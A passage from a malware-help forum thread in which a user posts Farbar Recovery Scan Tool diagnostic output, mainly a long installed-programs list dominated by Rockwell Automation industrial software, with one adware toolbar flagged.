C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2014-10-27 10:16

 

==================== End Of Log ============================

Link to post
Share on other sites
MarkL123

MarkL123

Posted
  • Author
Posted

Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
Ran by Mark at 2014-11-05 16:34:11
Running from C:\Users\Mark\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
1769-L1Y Controllers and Embedded Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
1769-L2Y Controllers and Embedded Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.0.1) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA0000000001}) (Version: 10.0.1 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Anybus IPconfig (HKLM-x32\...\{D34DCFE0-B94C-4169-AA8A-ED6C6C1EDF46}_is1) (Version: 1.8.1.2 - HMS Industrial Networks)
Citrix Online Launcher (HKLM-x32\...\{75B8A55E-0762-4676-AAC0-6FDF025B034B}) (Version: 1.0.220 - Citrix)
Cognex 1756 Comm Module Profiles (x32 Version: 1.16.1.0 - Cognex Corp) Hidden
ControlFLASH (HKLM-x32\...\{ACA55DEA-DF89-47E1-8A80-0EE2248A158D}) (Version: 9.00.015 - Rockwell Software)
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - Acro Software Inc.)
CyberLink PowerDVD 9.6 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.6.1.4418 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{50B4B603-A4C6-4739-AE96-6C76A0F8A388}) (Version: 1.3.1 - Dell Inc.)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1200.101.127 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DriveTools V5.02.99 (HKLM-x32\...\{CD26B287-C7D5-4783-806B-190528F31480}) (Version: 5.02.99 - Rockwell Automation)
DWG TrueView 2013 (HKLM\...\DWG TrueView 2013) (Version: 19.0.55.0 - Autodesk)
DWG TrueView 2013 (Version: 19.0.55.0 - Autodesk) Hidden
Endress+Hauser EtherNet/IP Comm Module Profiles (x32 Version: 1.18.1.0 - Endress+Hauser, Inc.) Hidden
ENI / ENIW Utility (HKLM-x32\...\{BC90BA1D-F878-4FCF-9020-220744376E81}) (Version:  - )
EPSON Connect version 1.0 (HKLM-x32\...\EPSON Connect_is1) (Version: 1.0 - Epson America Inc.)
Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.6.3.0 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{116DBCAF-9544-4592-9156-AC99F6C2D426}) (Version: 3.10.0016 - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON XP-610 Series Printer Uninstall (HKLM\...\EPSON XP-610 Series) (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
FactoryTalk Activation Manager 3.50.00 (CPR 9 SR 5) (HKLM-x32\...\{B23DFE1A-5EED-4E71-B800-0F42D803D257}) (Version: 3.50.00.0021 - Rockwell Automation, Inc.)
FactoryTalk Diagnostics 2.50 (CPR 9 SR 5) (HKLM-x32\...\{4852B254-72F7-4098-A9BB-A821669ED85C}) (Version: 2.50.00.0010 - Rockwell Automation, Inc.)
FactoryTalk Gateway 3.50.00 (CPR 9 SR 5) (HKLM-x32\...\{EBEE6A9D-E577-4798-92F7-031C8FE9E478}) (Version: 3.50.00 - Rockwell Automation, Inc.)
FactoryTalk Services Platform 2.50 (CPR 9 SR 5) (HKLM-x32\...\{E2145D1A-0D6B-4160-821F-5EC96DCAFAA4}) (Version: 2.50.00.0010 - Rockwell Automation, Inc.)
FactoryTalk® View Machine Edition 6.10.00 (CPR 9 SR 4) (HKLM-x32\...\{ADE57A5D-6AC7-4F5B-925E-52FC60F77ECF}) (Version: 6.10.00.9 (CPR 9 SR 4) - Rockwell Automation, Inc.)
FreeFileSync v3.18 (HKLM-x32\...\FreeFileSync) (Version:  - )
FromDocToPDF Internet Explorer Toolbar (HKLM-x32\...\FromDocToPDF_65bar Uninstall Internet Explorer) (Version:  - Mindspark Interactive Network) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hardy Instruments 1756 Specialty Module Profiles (x32 Version: 1.07.1.0 - Hardy Instruments, Inc.) Hidden
Hardy Instruments 1769 Specialty Module Profiles (x32 Version: 2.08.1.0 - Hardy Instruments, Inc.) Hidden
HASP Device Drivers (HKLM-x32\...\HASP Device Drivers) (Version:  - )
HyperTerminal Private Edition v7.0 (HKLM-x32\...\HTPE3) (Version:  - )
Ignition (HKLM\...\Ignition 7.7.0) (Version: 7.7.0 - Inductive Automation)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.18.10.3071 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Java 8 Update 20 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418020F0}) (Version: 8.0.200 - Oracle Corporation)
Jazz-Plugin (HKLM-x32\...\{1C92BD87-DC1B-4C4E-BFB4-2C79E88FA752}) (Version: 1.1.0 - Jazz-Soft)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Keyspan USB Serial Adapter (HKLM-x32\...\{2E97DE76-851A-48AA-A0D6-665860FAD9CA}) (Version: 3.7.2 - Keyspan)
Logix Designer Motion Database (x32 Version: 21.03.19 - Rockwell Automation, Inc.) Hidden
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mettler-Toledo 1756 Comm Module Profiles (x32 Version: 1.09.1.0 - Mettler-Toledo Corporation) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Lync Web App Plug-in (HKLM\...\{D8228565-6CD7-40EF-B2EA-C7C95183EDEB}) (Version: 15.8.8308.577 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 Management Objects (HKLM-x32\...\{F5E87B12-3C27-452F-8E78-21D42164FD83}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 (HKLM-x32\...\Microsoft SQL Server 2008 R2) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Native Client (HKLM\...\{2180B33F-3225-423E-BBC1-7798CFD3CD1F}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Setup (English) (HKLM-x32\...\{72DE3C67-FB48-450E-8BEA-4EB1B3B5355D}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM-x32\...\{D441BD04-E548-4F8E-97A4-1B66135BAAA8}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server Browser (HKLM-x32\...\{BF9BF038-FE03-429D-9B26-2FA0FD756052}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 x64 ENU (HKLM\...\{8424B163-D1E0-48B7-88A2-C7A61767B3D7}) (Version: 4.0.8482.1 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{288D79EE-A2D1-42AF-9597-B0ADCC23A8ED}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package - SE (x64) (HKLM\...\Microsoft Visual J# 2.0 Redistributable Package - SE (x64)) (Version:  - Microsoft Corporation)
Molex Corporation 1756 Comm Module Profiles (x32 Version: 1.25.1.0 - Molex Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\InstallShield_{C8B104BE-C895-4976-8295-0B190B53A8B6}) (Version: 3.0.08.18 - O2Micro International LTD.)
O2Micro Flash Memory Card Windows Driver (x32 Version: 3.0.08.18 - O2Micro International LTD.) Hidden
Online Development 1756 Comm Module Profiles (x32 Version: 1.02.1.0 - Online Development, Inc.) Hidden
Parker Isysnet Analog Module Profiles (x32 Version: 6.02.2.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet ASCII Module Profile (x32 Version: 2.02.1.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet ControlNet Adapter Module Profile (x32 Version: 3.00.0.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Discrete Module Profiles (x32 Version: 6.02.2.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Discrete Module Profiles 2 (x32 Version: 2.02.1.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Discrete Module Profiles 3 (x32 Version: 2.02.1.0 - Parker Hannifin Corporation) Hidden
Parker Isysnet Ethernet Adapter Module Profile (x32 Version: 3.00.0.0 - Parker Hannifin Corporation) Hidden
Phoenix Digital 1756 Communication Module Profiles (x32 Version: 1.05.1.0 - Phoenix Digital, Inc.) Hidden
PhotoShowExpress (x32 Version: 2.0.063 - Sonic Solutions) Hidden
ProSoft Technology 1734 Ethernet Adapter Module Profile (x32 Version: 1.13.1.0 - ProSoft Technology, Inc.) Hidden
ProSoft Technology 1756 MVI Comm Module Profiles (x32 Version: 1.10.1.0 - ProSoft Technology, Inc.) Hidden
Prosoft Technology 1769 Comm Module Profiles (x32 Version: 2.01.1.0 - Prosoft Technology, Inc.) Hidden
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Realtek Audio COM Components (HKLM-x32\...\{2355B503-9B11-4449-861D-1C1748B26320}) (Version: 1.0.2 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5956 - Realtek Semiconductor Corp.)
Redundancy Module Config Tool (HKLM-x32\...\InstallShield_{25010847-562B-45AF-85D0-B40F283F20C5}) (Version: 7.2.7.0 - Rockwell Automation, Inc.)
Redundancy Module Config Tool (x32 Version: 7.2.7.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1440 XM Dynamic Measurement Module Profile (x32 Version: 2.01.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1715 Ethernet Adapter Module Profile (x32 Version: 1.04.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1715 Redundant I/O Module Profiles (x32 Version: 2.04.3.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1732 Discrete Module Profiles (x32 Version: 2.02.1.0 - Rockwell Software, Inc.) Hidden
Rockwell Automation 1732 Discrete Module Profiles 2 (x32 Version: 2.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Analog Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Analog Module Profiles 2 (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 ASCII Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 ControlNet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profile, DeviceLogix (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profiles 2 (x32 Version: 3.00.2579.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Discrete Module Profiles 4 (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Ethernet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Ethernet Adapter,2-Port,Module Profile (x32 Version: 5.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Point Guard Safety Module Profile (x32 Version: 1.01.21.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1734 Specialty Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Analog Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Analog Module Profiles 2 (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 ASCII Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 ControlNet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profile, DeviceLogix (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles (x32 Version: 7.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles 2 (x32 Version: 3.00.2579.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles 3 (x32 Version: 2.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Discrete Module Profiles 4 (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Ethernet Adapter Module Profile (x32 Version: 4.00.2577.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Ethernet Adapter,2-Port,Module Profile (x32 Version: 4.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1738 Specialty Module Profiles (x32 Version: 3.00.2578.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1747 Module Profiles (x32 Version: 8.00.3000.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 CNet Comms Module Profiles (x32 Version: 1.02.572.0 - Rockwell Software, Inc.) Hidden
Rockwell Automation 1756 ENet Comms Module Profiles (x32 Version: 1.02.572.0 - Rockwell Software, Inc.) Hidden
Rockwell Automation 1756 ENet Comms Module Profiles (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 Ethernet Bridge Module Profile (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 HART Module Profiles (x32 Version: 3.06.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1756 Remote I/O Interface Module Profile (x32 Version: 2.03.3.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Analog Module Profiles (x32 Version: 7.02.8.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Analog Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 ASCII Module Profiles (x32 Version: 2.02.7.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Boolean Module Profiles (x32 Version: 2.02.5.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Controller Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Discrete Module Profiles (x32 Version: 2.02.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Discrete Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Embedded Module Profiles (x32 Version: 2.02.10.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769 Specialty Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1769-L3Y Controllers Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1783 Ethernet Managed Switch Module Profile (x32 Version: 2.00.2479.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1791DS Discrete Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 1799 Embedded Discrete Module Profile (x32 Version: 1.01.6.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 2097 Kinetix Module Profiles (x32 Version: 2.01.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 280 ArmorStart Ethernet Module Profiles (x32 Version: 1.03.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 2-Port CIP Sync ENetIP Module Profiles (x32 Version: 2.01.10.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 2-Port Quick Connect ENetIP Module Profiles (x32 Version: 1.01.13.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 48MS Vision Sensor Module Profiles (x32 Version: 1.01.19.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation 5XRF RFID Reader Module Profiles (x32 Version: 1.02.24.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation ArmorStart LT Module Profiles (x32 Version: 1.02.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Catalog Services (x32 Version: 2.00.06 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profile (x32 Version: 5.04.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 2.02.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 5.01.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 5.04.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO DeviceNet Safety Module Profiles (x32 Version: 5.04.4.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation DIO EtherNet Safety Module Profiles (x32 Version: 5.03.1.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Download Manager (HKLM-x32\...\{FFAD8DA9-ED41-494d-AC8E-63D861D0A733}) (Version: 2.0.7.35 - NOS Microsystems Ltd.)
Rockwell Automation Driver Package x64 (HKLM-x32\...\{03AE0196-A77D-4DB1-BEA2-2ED79723FB30}) (Version: 1.1.11 - Rockwell Automation.)
Rockwell Automation Drives Peripheral Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 4 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 2 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 3 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 4 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives PowerFlex 7 Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Drives SCANport Module Profiles (x32 Version: 4.06.20.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation E1 Plus Module Profiles (x32 Version: 1.01.0.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation EtherNet/IP Tap Family Module Profiles (x32 Version: 2.06.2.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Flex Adapter Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Generic Safety Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Kinetix CIP Motion Drive Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Kinetix350 CIP Motion Drive Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation PowerFlex CIP Motion Drive Module Profiles (x32 Version: 13.01.0.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation SLC Adapter Module Profiles (x32 Version: 8.03.2783.0 - Rockwell Automation, Inc.) Hidden
Rockwell Automation Stratix 8000/8300 Module Profiles (x32 Version: 5.01.10.0 - Rockwell Automation, Inc.) Hidden
Rockwell Software Hardware Maintenance Tool (HKLM-x32\...\RSHWare) (Version:  - )
Rockwell Windows Firewall Configuration Utility 1.00.06 (HKLM-x32\...\{01D8D3AA-2A4F-4085-9CC3-61E389D86D29}) (Version: 1.00.06.0004 - Rockwell Automation, Inc.)
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio File Backup (Version: 1.3.2 - Roxio) Hidden
RSLinx Classic 2.59.02 CPR 9 SR 5 (HKLM-x32\...\{34540622-805E-4CC7-98CF-65A43E99CF4D}) (Version: 2.59.02 CPR 9 SR 5 - Rockwell Automation, Inc.)
RSLinx Enterprise 5.50.00 (CPR 9 SR 5) (HKLM-x32\...\{777B68AF-27F3-42ED-9B39-B1202E5F71E0}) (Version: 5.50.00 - Rockwell Automation, Inc.)
RSLogix 5 English 7.40.00 (CPR 9) (HKLM-x32\...\{1866FCD2-4DFE-4E79-90B0-E4707DA753D9}) (Version: 7.40.00 - Rockwell Automation, Inc.)
RSLogix 500 English 8.40.00 (CPR 9) (HKLM-x32\...\{436D42D9-1809-40C5-9A82-D2ED2F8EF58C}) (Version: 8.40.00 - Rockwell Automation Inc)
RSLogix 5000 Compare (HKLM-x32\...\{D6088EA7-1828-40AF-A684-3C1AD67FDE68}) (Version: 3.20.00 - Rockwell Software)
RSLogix 5000 Module Profile Core (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Core EDS Support (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Core System Updates (x32 Version: 6.00.1769.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Core System Updates 1 (x32 Version: 8.00.2421.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Module Profile Setup Utility (x32 Version: 9.06.3454.0 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Online Books (HKLM-x32\...\{11000020-B129-11DF-A296-000C296D58C5}) (Version: 20.0.0 - Rockwell Automation, Inc.)
RSLogix 5000 Online Books (HKLM-x32\...\{11010120-B129-11DF-A296-000C296D58C5}) (Version: 20.1.0 - Rockwell Automation, Inc.)
RSLogix 5000 Setup Installer (x32 Version: 5.00.0000 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 Start Page Media v20.01.00 (HKLM-x32\...\{10000120-D5FD-11DA-A128-000C29473C90}) (Version: 20.01.00 - Rockwell Automation, Inc.)
RSLogix 5000 System Updates (x32 Version: 20.10.0410 - Rockwell Automation, Inc.) Hidden
RSLogix 5000 v13.04 (HKLM-x32\...\{30010413-EC33-11D6-A408-F6139379CBFB}) (Version: 13.04.0000 - Rockwell Software, Inc.)
RSLogix 5000 v15.02 (HKLM-x32\...\{30010215-EC33-11D6-A408-F6139379CBFB}) (Version: 15.02.0000 - Rockwell Software, Inc.)
RSLogix 5000 v16.04.00 (CPR 9) (HKLM-x32\...\{30010416-EC33-11D6-A408-F6139379CBFB}) (Version: 16.04.00 - Rockwell Automation, Inc.)
RSLogix 5000 v17.01.00 (CPR 9 SR 1) (HKLM-x32\...\{30010117-EC33-11D6-A408-F6139379CBFB}) (Version: 17.01.00 - Rockwell Automation, Inc.)
RSLogix 5000 v18.02.00 (CPR 9 SR 2) (HKLM-x32\...\{30010218-EC33-11D6-A408-F6139379CBFB}) (Version: 18.02.00 - Rockwell Automation, Inc.)
RSLogix 5000 v19.01.00 (CPR 9 SR 3) (HKLM-x32\...\{30010119-EC33-11D6-A408-F6139379CBFB}) (Version: 19.01.00 - Rockwell Automation, Inc.)
RSLogix 5000 v20.01.00 (CPR 9 SR 5) (HKLM-x32\...\{31000120-EC33-11D6-A408-F6139379CBFB}) (Version: 20.01.00 - Rockwell Automation, Inc.)
